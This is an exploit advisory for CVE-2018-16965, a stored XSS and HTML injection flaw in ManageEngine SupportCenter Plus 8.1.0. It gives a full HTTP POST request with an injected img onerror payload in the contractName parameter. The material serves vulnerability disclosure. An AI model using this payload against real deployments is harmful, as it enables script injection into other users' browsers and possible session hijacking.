ManageEngine SupportCenter Plus 8.1.0 Cross Site Scripting

ManageEngine SupportCenter Plus version 8.1.0 suffers from cross site scripting and html injection vulnerabilities.


MD5 | ea19af7bdfd99c3b50dd3d6121956d70

# Exploit Title: ManageEngine SupportCenter Plus 8.1.0 - HTML Injection and Stored XSS
# Date: 2018-09-12
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.manageengine.com/
# Hardware Link : https://www.manageengine.com/products/support-center/
# Software : ZOHO Corp ManageEngine SupportCenter Plus
# Product Version : 8.1.0
# Build Number : 8106
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : CVE-2018-16965

In Zoho ManageEngine SupportCenter Plus 8.1.0, there is HTML Injection and Stored XSS via the /ServiceContractDef.do contractName parameter.

# HTTP Request Header :

POST /ServiceContractDef.do HTTP/1.1
Host: demo.supportcenterplus.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.supportcenterplus.com/ServiceContractDef.do
Cookie: JSESSIONID=A23F9A80AF7BA95A4D3D1ADA0753BB00; JSESSIONIDSSO=4A3C963EDC44F7D4E50067D34DCDC1E6; [object HTMLDivElement]=hide
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 604

contractName=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27ismailtasdelen%27%29%3E&contractID=&contractInfoID=&contractMode=&createdBy=&services=&supportPlanRates=1%3D0.0&contractNumber=&currentDate=2018-09-12&fromDate=2018-09-12&toDate=2018-09-13&productList=&radio1=allProd&customerName=ismailtasdelen&description=&supportPlanID=1&supportPlanType=Hour+Based&rateTypeCost=0.0&totalCost=0.0&noofHours=0&noofMins=0&noofIncidents=0&servicename=&servicedesc=&attach=&attPath=&component=ServiceContract&attSize=&attachments=&selected=&beforeDays=00&beforeEnd=00&addContract=Save

Related Posts